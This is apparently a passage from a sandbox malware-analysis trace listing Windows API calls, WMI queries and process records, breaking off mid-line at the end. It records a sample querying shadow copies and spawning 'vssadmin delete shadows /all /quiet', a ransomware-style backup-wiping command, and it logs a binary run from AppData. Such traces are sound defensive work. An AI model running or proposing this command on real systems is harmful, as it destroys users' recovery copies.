lpString2="ASSOC", cchCount2=5) returned 3 [0097.353] WbemLocator:IUnknown:AddRef (This=0x990828) returned 0x3 [0097.353] free (_Block=0x182860) [0097.353] lstrlenW (lpString="") returned 0 [0097.353] lstrlenW (lpString="XDUWTFONO") returned 9 [0097.353] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0097.353] lstrlenW (lpString="XDUWTFONO") returned 9 [0097.353] malloc (_Size=0x14) returned 0x18ebe8 [0097.353] lstrlenW (lpString="XDUWTFONO") returned 9 [0097.354] GetCurrentThreadId () returned 0x864 [0097.354] GetCurrentProcess () returned 0xffffffff [0097.354] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1cfce0 | out: TokenHandle=0x1cfce0*=0x298) returned 1 [0097.354] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cfcdc | out: TokenInformation=0x0, ReturnLength=0x1cfcdc) returned 0 [0097.354] malloc (_Size=0x118) returned 0x2352448 [0097.354] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x2352448, TokenInformationLength=0x118, ReturnLength=0x1cfcdc | out: TokenInformation=0x2352448, ReturnLength=0x1cfcdc) returned 1 [0097.354] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x2352448*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0097.354] free (_Block=0x2352448) [0097.354] CloseHandle (hObject=0x298) returned 1 [0097.355] lstrlenW (lpString="GET") returned 3 [0097.355] lstrlenW (lpString="delete") returned 6 [0097.355] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0097.355] lstrlenW (lpString="LIST") returned 4 [0097.355] lstrlenW (lpString="delete") returned 6 [0097.355] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0097.355] lstrlenW (lpString="SET") returned 3 [0097.355] lstrlenW (lpString="delete") returned 6 [0097.355] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0097.355] lstrlenW (lpString="CALL") returned 4 [0097.355] lstrlenW (lpString="delete") returned 6 [0097.355] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0097.355] lstrlenW (lpString="ASSOC") returned 5 [0097.355] lstrlenW (lpString="delete") returned 6 [0097.355] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0097.355] lstrlenW (lpString="CREATE") returned 6 [0097.355] lstrlenW (lpString="delete") returned 6 [0097.355] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0097.355] lstrlenW (lpString="DELETE") returned 6 [0097.356] lstrlenW (lpString="delete") returned 6 [0097.356] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0097.358] malloc (_Size=0xc) returned 0x2352078 [0097.359] lstrlenA (lpString="") returned 0 [0097.359] malloc (_Size=0x2) returned 0x182860 [0097.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa926a2, cbMultiByte=-1, lpWideCharStr=0x182860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0097.359] free (_Block=0x182860) [0097.359] malloc (_Size=0xc) returned 0x23520c0 [0097.359] lstrlenA (lpString="") returned 0 [0097.359] malloc (_Size=0x2) returned 0x182860 [0097.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa926a2, cbMultiByte=-1, lpWideCharStr=0x182860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0097.359] free (_Block=0x182860) [0097.359] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.359] malloc (_Size=0x3e) returned 0x18ff68 [0097.359] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.359] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x49f73d46 | out: _String="Select", _Context=0x49f73d46) returned="Select" [0097.359] malloc (_Size=0xc) returned 0x2352168 [0097.360] free (_Block=0x23520c0) [0097.360] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49f73d46 | out: _String=0x0, _Context=0x49f73d46) returned="*" [0097.360] lstrlenW (lpString="FROM") returned 4 [0097.360] lstrlenW (lpString="*") returned 1 [0097.360] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0097.360] malloc (_Size=0xc) returned 0x23520c0 [0097.360] free (_Block=0x2352168) [0097.360] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49f73d46 | out: _String=0x0, _Context=0x49f73d46) returned="from" [0097.360] lstrlenW (lpString="FROM") returned 4 [0097.360] lstrlenW (lpString="from") returned 4 [0097.360] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0097.360] malloc (_Size=0xc) returned 0x2352168 [0097.361] free (_Block=0x23520c0) [0097.361] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49f73d46 | out: _String=0x0, _Context=0x49f73d46) returned="Win32_ShadowCopy" [0097.361] malloc (_Size=0xc) returned 0x23520c0 [0097.361] free (_Block=0x2352168) [0097.361] free (_Block=0x18ff68) [0097.361] malloc (_Size=0xc) returned 0x2352168 [0097.361] malloc (_Size=0xc) returned 0x23520a8 [0097.362] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0097.362] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0097.362] free (_Block=0x2352078) [0097.362] free (_Block=0x2352168) [0097.363] ??0CHString@@QAE@XZ () returned 0x1cfc5c [0097.363] GetCurrentThreadId () returned 0x864 [0097.363] malloc (_Size=0xc) returned 0x2352168 [0097.363] malloc (_Size=0xc) returned 0x2352078 [0097.363] malloc (_Size=0xc) returned 0x2352108 [0097.363] malloc (_Size=0xc) returned 0x2352120 [0097.363] malloc (_Size=0xc) returned 0x2352138 [0097.363] SysStringLen (param_1="\\\\") returned 0x2 [0097.363] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0097.364] malloc (_Size=0xc) returned 0x2352150 [0097.364] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0097.364] SysStringLen (param_1="\\") returned 0x1 [0097.364] malloc (_Size=0xc) returned 0x2352180 [0097.364] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0097.364] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0097.365] free (_Block=0x2352150) [0097.365] free (_Block=0x2352138) [0097.365] free (_Block=0x2352120) [0097.365] free (_Block=0x2352108) [0097.365] free (_Block=0x2352078) [0097.365] free (_Block=0x2352168) [0097.365] malloc (_Size=0xc) returned 0x2352168 [0097.366] malloc (_Size=0xc) returned 0x2352078 [0097.366] malloc (_Size=0xc) returned 0x2352108 [0097.366] WbemLocator:IWbemLocator:ConnectServer (in: This=0x990828, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xadc204 | out: ppNamespace=0xadc204*=0x99d0bc) returned 0x0 [0097.575] free (_Block=0x2352108) [0097.575] free (_Block=0x2352078) [0097.575] free (_Block=0x2352168) [0097.575] CoSetProxyBlanket (pProxy=0x99d0bc, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0097.576] free (_Block=0x2352180) [0097.576] ??1CHString@@QAE@XZ () returned 0x75330504 [0097.576] ??0CHString@@QAE@XZ () returned 0x1cfc54 [0097.576] GetCurrentThreadId () returned 0x864 [0097.576] malloc (_Size=0xc) returned 0x2352180 [0097.576] lstrlenA (lpString="") returned 0 [0097.576] malloc (_Size=0x2) returned 0x182860 [0097.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa926a2, cbMultiByte=-1, lpWideCharStr=0x182860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0097.577] free (_Block=0x182860) [0097.577] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0097.577] SysStringLen (param_1="") returned 0x0 [0097.577] free (_Block=0x2352180) [0097.577] malloc (_Size=0xc) returned 0x2352180 [0097.577] IWbemServices:ExecQuery (in: This=0x99d0bc, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x1cfc50 | out: ppEnum=0x1cfc50*=0x0) returned 0x80041014 [0104.486] free (_Block=0x2352180) [0104.486] _CxxThrowException () [0104.487] malloc (_Size=0x10) returned 0x2352180 [0104.487] ??1CHString@@QAE@XZ () returned 0x75330504 [0104.487] free (_Block=0x23520c0) [0104.487] free (_Block=0x23520a8) [0104.487] GetCurrentThreadId () returned 0x864 [0104.488] ??0CHString@@QAE@PBG@Z () returned 0x1cfd14 [0104.488] ??YCHString@@QAEABV0@PBG@Z () returned 0x1cfd14 [0104.488] ??0CHString@@QAE@XZ () returned 0x1cfbd8 [0104.488] malloc (_Size=0xc) returned 0x23520a8 [0104.488] malloc (_Size=0xc) returned 0x23520c0 [0104.488] SysStringLen (param_1="") returned 0x0 [0104.488] free (_Block=0x23520a8) [0104.488] CoCreateInstance (in: rclsid=0xa96cb0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa96c00*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xadc21c | out: ppv=0xadc21c*=0x990810) returned 0x0 [0104.495] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x990810, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x1cfbf0 | out: MessageText=0x1cfbf0*="Initialization failure\r\n") returned 0x0 [0104.496] free (_Block=0x23520c0) [0104.496] malloc (_Size=0xc) returned 0x23520c0 [0104.496] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x990810, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x1cfc14 | out: MessageText=0x1cfc14*="WMI") returned 0x0 [0104.496] malloc (_Size=0xc) returned 0x23520a8 [0104.497] lstrlenW (lpString="WMI") returned 3 [0104.497] lstrlenW (lpString="Wbem") returned 4 [0104.497] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0104.497] lstrlenW (lpString="WMI") returned 3 [0104.497] lstrlenW (lpString="WMI") returned 3 [0104.497] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0104.497] WbemStatusCodeText:IUnknown:Release (This=0x990810) returned 0x0 [0104.497] ??1CHString@@QAE@XZ () returned 0x75330504 [0104.497] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x1cf440, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0104.497] FormatMessageW (in: dwFlags=0x2500, lpSource=0x1cf440, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf43c, nSize=0x0, Arguments=0x1cf428 | out: lpBuffer="晨HERROR:\r\nDescription = %1") returned 0x2e [0104.497] malloc (_Size=0xc) returned 0x2352168 [0104.498] LocalFree (hMem=0x486668) returned 0x0 [0104.498] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0104.498] malloc (_Size=0x2f) returned 0x2352448 [0104.498] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x2352448, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0104.498] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 46 [0104.500] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned 0 [0104.500] free (_Block=0x2352448) [0104.500] free (_Block=0x2352168) [0104.500] free (_Block=0x23520a8) [0104.500] free (_Block=0x23520c0) [0104.500] ??1CHString@@QAE@XZ () returned 0x1 [0104.500] ??0CHString@@QAE@PBG@Z () returned 0x1cfd34 [0104.500] ??YCHString@@QAEABV0@PBG@Z () returned 0x1cfd34 [0104.500] GetCurrentThreadId () returned 0x864 [0104.500] ??1CHString@@QAE@XZ () returned 0x1 [0104.500] WbemLocator:IUnknown:Release (This=0x99d0bc) returned 0x0 [0104.513] ?Empty@CHString@@QAEXXZ () returned 0x75330504 [0104.513] free (_Block=0x2352180) [0104.515] _kbhit () returned 0x0 [0104.520] free (_Block=0x183228) [0104.520] free (_Block=0x2352060) [0104.520] free (_Block=0x18fe88) [0104.520] free (_Block=0x18fe70) [0104.520] free (_Block=0x18fe58) [0104.520] free (_Block=0x1831c8) [0104.520] free (_Block=0x18eb88) [0104.520] free (_Block=0x18ff30) [0104.520] free (_Block=0x23520d8) [0104.520] free (_Block=0x18feb0) [0104.520] free (_Block=0x23520f0) [0104.520] free (_Block=0x18ebc8) [0104.520] free (_Block=0x18ff20) [0104.521] free (_Block=0x182ee0) [0104.521] free (_Block=0x18fef8) [0104.521] ?Empty@CHString@@QAEXXZ () returned 0x75330504 [0104.521] free (_Block=0x1831f8) [0104.521] free (_Block=0x18eba8) [0104.521] free (_Block=0x2352090) [0104.521] free (_Block=0x182788) [0104.521] free (_Block=0x1827d0) [0104.521] free (_Block=0x182818) [0104.521] free (_Block=0x18ebe8) [0104.521] free (_Block=0x1828c8) [0104.521] free (_Block=0x182ec8) [0104.521] free (_Block=0x18e8c8) [0104.522] free (_Block=0x182eb0) [0104.522] free (_Block=0x18e8a8) [0104.522] free (_Block=0x182e98) [0104.522] free (_Block=0x18e888) [0104.522] free (_Block=0x182a10) [0104.522] free (_Block=0x182a28) [0104.522] free (_Block=0x1829d8) [0104.522] free (_Block=0x1829f0) [0104.522] free (_Block=0x182a48) [0104.522] free (_Block=0x182a60) [0104.523] free (_Block=0x182a80) [0104.543] free (_Block=0x18e868) [0104.543] free (_Block=0x182968) [0104.544] free (_Block=0x182980) [0104.544] free (_Block=0x182930) [0104.544] free (_Block=0x182948) [0104.544] free (_Block=0x1829a0) [0104.544] free (_Block=0x1829b8) [0104.544] free (_Block=0x1828f8) [0104.544] free (_Block=0x182910) [0104.544] free (_Block=0x182880) [0104.545] free (_Block=0x183fb8) [0104.545] free (_Block=0x23505b0) [0104.545] WbemLocator:IUnknown:Release (This=0x990828) returned 0x2 [0104.545] WbemLocator:IUnknown:Release (This=0x99d064) returned 0x0 [0104.550] WbemLocator:IUnknown:Release (This=0x99d00c) returned 0x0 [0104.551] WbemLocator:IUnknown:Release (This=0x990828) returned 0x1 [0104.551] ?Empty@CHString@@QAEXXZ () returned 0x75330504 [0104.551] WbemLocator:IUnknown:Release (This=0x990828) returned 0x0 [0104.552] free (_Block=0x18fdf8) [0104.552] free (_Block=0x18fe10) [0104.552] free (_Block=0x18eb48) [0104.552] free (_Block=0x18fe28) [0104.552] free (_Block=0x18fe40) [0104.552] free (_Block=0x18eb68) [0104.552] free (_Block=0x18fcd8) [0104.552] free (_Block=0x18fcf0) [0104.552] free (_Block=0x18ea88) [0104.553] free (_Block=0x18fd08) [0104.553] free (_Block=0x18fd20) [0104.553] free (_Block=0x18eaa8) [0104.553] free (_Block=0x18fc78) [0104.553] free (_Block=0x18fc90) [0104.553] free (_Block=0x18ea48) [0104.553] free (_Block=0x18fca8) [0104.553] free (_Block=0x18fcc0) [0104.553] free (_Block=0x18ea68) [0104.554] free (_Block=0x18fd98) [0104.554] free (_Block=0x18fdb0) [0104.554] free (_Block=0x18eb08) [0104.554] free (_Block=0x18fdc8) [0104.554] free (_Block=0x18fde0) [0104.554] free (_Block=0x18eb28) [0104.555] free (_Block=0x18fc18) [0104.555] free (_Block=0x18fc30) [0104.555] free (_Block=0x18ea08) [0104.555] free (_Block=0x18fc48) [0104.555] free (_Block=0x18fc60) [0104.555] free (_Block=0x18ea28) [0104.555] free (_Block=0x18fd38) [0104.555] free (_Block=0x18fd50) [0104.555] free (_Block=0x18eac8) [0104.556] free (_Block=0x18fd68) [0104.556] free (_Block=0x18fd80) [0104.556] free (_Block=0x18eae8) [0104.556] free (_Block=0x18fb88) [0104.556] free (_Block=0x18fba0) [0104.556] free (_Block=0x18e9a8) [0104.556] free (_Block=0x183160) [0104.556] free (_Block=0x183178) [0104.556] free (_Block=0x18e908) [0104.556] free (_Block=0x182f28) [0104.557] free (_Block=0x182f40) [0104.557] free (_Block=0x18e8e8) [0104.557] free (_Block=0x18faf8) [0104.557] free (_Block=0x18fb10) [0104.557] free (_Block=0x18e948) [0104.557] free (_Block=0x18fbb8) [0104.557] free (_Block=0x18fbd0) [0104.557] free (_Block=0x18e9c8) [0104.557] free (_Block=0x18fac8) [0104.558] free (_Block=0x18fae0) [0104.558] free (_Block=0x18e928) [0104.558] free (_Block=0x18fb28) [0104.558] free (_Block=0x18fb40) [0104.558] free (_Block=0x18e968) [0104.558] free (_Block=0x18fb58) [0104.558] free (_Block=0x18fb70) [0104.558] free (_Block=0x18e988) [0104.558] free (_Block=0x18fbe8) [0104.559] free (_Block=0x18fc00) [0104.559] free (_Block=0x18e9e8) [0104.559] CoUninitialize () [0104.888] exit (_Code=-2147217388) [0104.888] free (_Block=0x183190) [0104.888] free (_Block=0x183e88) [0104.888] ??1CHString@@QAE@XZ () returned 0x75330504 [0104.888] free (_Block=0x183000) [0104.888] free (_Block=0x1828e8) [0104.888] free (_Block=0x183e68) [0104.888] free (_Block=0x183e48) [0104.888] free (_Block=0x183e18) [0104.888] free (_Block=0x183df8) [0104.888] free (_Block=0x183dc8) [0104.888] free (_Block=0x1813d8) [0104.889] free (_Block=0x1813b8) [0104.889] ??1CHString@@QAE@XZ () returned 0x75330504 [0104.889] free (_Block=0x182f58) Thread: id = 105 os_tid = 0x240 Thread: id = 147 os_tid = 0xd58 Thread: id = 150 os_tid = 0xd6c Thread: id = 151 os_tid = 0xd70 Thread: id = 152 os_tid = 0xd74 Process: id = "19" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x3f298000" os_pid = "0x820" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x6c0" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0xbd4 Thread: id = 103 os_tid = 0x340 Thread: id = 106 os_tid = 0xb08 Thread: id = 107 os_tid = 0xacc Thread: id = 108 os_tid = 0xaf8 Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 47 os_tid = 0x6f4 Thread: id = 48 os_tid = 0x6fc Thread: id = 49 os_tid = 0x7fc Thread: id = 50 os_tid = 0x324 Thread: id = 51 os_tid = 0xa40 Thread: id = 52 os_tid = 0x6f0 Thread: id = 53 os_tid = 0x5e4 Thread: id = 54 os_tid = 0x5f4 Thread: id = 55 os_tid = 0x1c4 Thread: id = 56 os_tid = 0x618 Thread: id = 57 os_tid = 0xa14 Thread: id = 58 os_tid = 0xa48 Thread: id = 59 os_tid = 0xb54 Thread: id = 60 os_tid = 0xb04 Thread: id = 61 os_tid = 0xaf4 Thread: id = 62 os_tid = 0xb0 Thread: id = 63 os_tid = 0xb64 Thread: id = 64 os_tid = 0xb14 Thread: id = 65 os_tid = 0x644 Thread: id = 66 os_tid = 0x648 Thread: id = 67 os_tid = 0x320 Thread: id = 68 os_tid = 0x6cc Thread: id = 69 os_tid = 0x42c Thread: id = 70 os_tid = 0x1e4 Thread: id = 71 os_tid = 0x760 Thread: id = 72 os_tid = 0x75c Thread: id = 73 os_tid = 0x74c Thread: id = 74 os_tid = 0x710 Thread: id = 75 os_tid = 0x6d0 Thread: id = 76 os_tid = 0x6bc Thread: id = 77 os_tid = 0x6b8 Thread: id = 78 os_tid = 0x6b0 Thread: id = 79 os_tid = 0x6a8 Thread: id = 80 os_tid = 0x69c Thread: id = 81 os_tid = 0x698 Thread: id = 82 os_tid = 0x688 Thread: id = 83 os_tid = 0x684 Thread: id = 84 os_tid = 0x678 Thread: id = 85 os_tid = 0x4a8 Thread: id = 86 os_tid = 0x46c Thread: id = 87 os_tid = 0x44c Thread: id = 88 os_tid = 0x424 Thread: id = 89 os_tid = 0x420 Thread: id = 90 os_tid = 0x41c Thread: id = 91 os_tid = 0x404 Thread: id = 92 os_tid = 0x14c Thread: id = 93 os_tid = 0x158 Thread: id = 94 os_tid = 0x3fc Thread: id = 95 os_tid = 0x3f4 Thread: id = 96 os_tid = 0x3e8 Thread: id = 97 os_tid = 0x39c Thread: id = 98 os_tid = 0x390 Thread: id = 99 os_tid = 0x38c Thread: id = 100 os_tid = 0x388 Thread: id = 101 os_tid = 0x37c Thread: id = 102 os_tid = 0x374 Thread: id = 125 os_tid = 0xc9c Thread: id = 126 os_tid = 0xca8 Thread: id = 127 os_tid = 0xcac Thread: id = 128 os_tid = 0xcb0 Thread: id = 129 os_tid = 0xcb4 Thread: id = 130 os_tid = 0xcb8 Thread: id = 131 os_tid = 0xcbc Thread: id = 132 os_tid = 0xcc0 Thread: id = 133 os_tid = 0xcc4 Thread: id = 134 os_tid = 0xcc8 Thread: id = 135 os_tid = 0xccc Thread: id = 136 os_tid = 0xcd0 Thread: id = 177 os_tid = 0xdf8 Thread: id = 178 os_tid = 0xdfc Thread: id = 179 os_tid = 0xe00 Thread: id = 180 os_tid = 0xe04 Thread: id = 181 os_tid = 0xe08 Thread: id = 224 os_tid = 0xed4 Thread: id = 225 os_tid = 0xed0 Thread: id = 226 os_tid = 0xee8 Thread: id = 227 os_tid = 0xef0 Thread: id = 229 os_tid = 0xf34 Thread: id = 230 os_tid = 0xf38 Thread: id = 231 os_tid = 0xf3c Thread: id = 232 os_tid = 0xf40 Thread: id = 233 os_tid = 0xf44 Thread: id = 234 os_tid = 0xf48 Thread: id = 235 os_tid = 0xf4c Thread: id = 236 os_tid = 0xf50 Thread: id = 237 os_tid = 0xf54 Thread: id = 238 os_tid = 0xf5c Thread: id = 268 os_tid = 0xfb4 Thread: id = 269 os_tid = 0xfb8 Thread: id = 273 os_tid = 0x388 Thread: id = 274 os_tid = 0xfd0 Thread: id = 275 os_tid = 0xfe0 Thread: id = 277 os_tid = 0x67c Thread: id = 278 os_tid = 0xae4 Process: id = "21" image_name = "mhtop32bit.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mhtop32bit.exe" page_root = "0x3ad41000" os_pid = "0xac4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 104 os_tid = 0x7b8 [0078.062] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cff3c | out: lpSystemTimeAsFileTime=0x2cff3c*(dwLowDateTime=0x1cb8a460, dwHighDateTime=0x1d62227)) [0078.062] GetCurrentThreadId () returned 0x7b8 [0078.062] GetCurrentProcessId () returned 0xac4 [0078.062] QueryPerformanceCounter (in: lpPerformanceCount=0x2cff34 | out: lpPerformanceCount=0x2cff34*=19811487835) returned 1 [0078.160] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0078.160] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.160] GetLastError () returned 0x57 [0078.160] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.160] GetLastError () returned 0x57 [0078.160] LoadLibraryExW (lpLibFileName="kernel32", 